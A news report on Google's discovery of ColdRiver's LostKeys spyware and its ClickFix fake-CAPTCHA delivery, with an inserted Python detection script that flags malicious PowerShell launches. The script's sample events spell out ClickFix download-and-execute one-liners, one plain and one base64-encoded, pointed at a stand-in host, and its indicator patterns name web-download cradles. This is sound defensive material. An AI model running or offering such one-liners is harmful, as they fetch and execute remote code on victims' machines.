Google has reported (as covered by Android Headlines) the discovery of new Russian spyware known as LostKeys, used by the hacking group ColdRiver, which is linked to the Russian FSB. The malware is designed to steal files and system data from Western organizations.

According to the Google Threat Intelligence Group (GTIG), LostKeys is delivered in targeted ClickFix attacks, a social-engineering technique that begins with a fake CAPTCHA page. The page instructs the victim to copy a command and paste it into the Windows Run dialog, so the victim launches a malicious PowerShell script themselves; that script downloads and executes further stages. The final objective is to install LostKeys, which acts as a digital vacuum, extracting files, directories, and system information from the host. The group also relies on other malware, including SPICA, to acquire documents.
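As an added example (not code from GTIG's report or from the article), the following Python script shows how a detection engineer might hunt for the launch pattern described above: PowerShell started from an interactive parent, with download-and-execute traits on its command line, scanned over a few constructed process-creation events. The event field names (modelled on Sysmon Event ID 1), the `.example` URL and the indicator list are assumptions; the indicators are generic ClickFix traits, and nothing here is specific to LostKeys.

```python
"""Heuristic detection of ClickFix-style PowerShell launches (added example).

Not GTIG's or the article's code. Scans constructed process-creation events
(field names assumed, modelled on Sysmon EID 1) for a PowerShell one-liner a
user pasted from a fake CAPTCHA page that then pulls down further stages.
The indicators are generic ClickFix traits, not LostKeys-specific.
"""
import base64
import re
from dataclasses import dataclass

# Parents that mean a human launched the shell (Run dialog / Explorer / a
# console) rather than a service or installer. Assumption: the Win+R Run
# dialog that ClickFix lures rely on spawns its child under explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Generic ClickFix command-line traits. Each alone is weak; see FLAG_THRESHOLD.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "bypass_policy": re.compile(r"-e(xecutionpolicy|p)\s+bypass\b", re.I),
    "web_download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod"
        r"|\biwr\b|\birm\b|Net\.WebClient|\bcurl\b", re.I),
    "inline_exec": re.compile(r"\biex\b|Invoke-Expression", re.I),
    # Lures often append a reassuring comment so the Run dialog shows text
    # like '# "I am not a robot - reCAPTCHA Verification ID: 1234"'.
    "captcha_lure": re.compile(r"I am not a robot|reCAPTCHA|Verification ID", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
FLAG_THRESHOLD = 3


@dataclass
class ProcessEvent:
    """Minimal process-creation record (constructed; mirrors Sysmon EID 1 fields)."""
    image: str
    parent_image: str
    command_line: str


@dataclass
class Verdict:
    score: int
    reasons: list[str]
    decoded: str


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent/invalid.

    Matching only the visible command line misses encoded one-liners, so the
    decoded payload is scanned with the same indicators.
    """
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event: ProcessEvent) -> Verdict:
    """Count coinciding indicators for one PowerShell process-creation event."""
    image = event.image.rsplit("\\", 1)[-1].lower()
    parent = event.parent_image.rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return Verdict(0, [], "")
    decoded = decode_encoded_command(event.command_line)
    text = event.command_line + "\n" + decoded
    reasons = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded:
        reasons.append("encoded_command")
    if parent in INTERACTIVE_PARENTS:
        reasons.append("interactive_parent")
    return Verdict(len(reasons), reasons, decoded)


def is_clickfix_like(event: ProcessEvent) -> bool:
    """Flag only when several weak indicators coincide; a hidden window or an
    execution-policy bypass alone is routine in legitimate automation."""
    return analyze(event).score >= FLAG_THRESHOLD


def _encode(ps: str) -> str:
    """Build an -EncodedCommand argument as PowerShell expects it (UTF-16LE base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; the host name uses the reserved .example TLD.
SAMPLE_EVENTS = {
    "user_opens_shell": ProcessEvent(PS_EXE, r"C:\Windows\explorer.exe", "powershell.exe"),
    "scheduled_admin_script": ProcessEvent(
        PS_EXE, r"C:\Windows\System32\svchost.exe",
        r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    "clickfix_plain": ProcessEvent(
        PS_EXE, r"C:\Windows\explorer.exe",
        "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
        ".DownloadString('http://captcha-verify.example/verify.txt')\" "
        "# \"I am not a robot - reCAPTCHA Verification ID: 8431\""),
    "clickfix_encoded": ProcessEvent(
        PS_EXE, r"C:\Windows\explorer.exe",
        "powershell -nop -w hidden -enc " + _encode(
            "IEX (New-Object Net.WebClient).DownloadString('http://captcha-verify.example/v')")),
}

if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        v = analyze(ev)
        print(f"{name:24s} score={v.score} flagged={v.score >= FLAG_THRESHOLD} {v.reasons}")
```

The two constructed lures are flagged while the scheduled admin script (hidden window plus policy bypass, but no interactive parent and no download) stays below the threshold. The encoded variant is caught only because the `-enc` blob is base64/UTF-16LE decoded before the indicators run; a rule that matched the visible command line alone would see just `-w hidden`.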

The ColdRiver group has been active since 2017 and is also tracked under other names, such as Star Blizzard and Callisto Group. Reports indicate that it has stepped up its activity in recent years, particularly since the onset of Russia's invasion of Ukraine. The group specializes in cyber espionage against government and defense entities, think tanks, politicians, journalists, and NGOs.

The U.S. has already imposed sanctions on individual members of the group and announced a reward of up to $10 million for information leading to their identification or location.

Google's specialists stress the need to strengthen cybersecurity, especially at organizations that could become targets of ColdRiver. They recommend enrolling at-risk users in Google's Advanced Protection Program and keeping software and security tooling up to date to guard against similar threats.
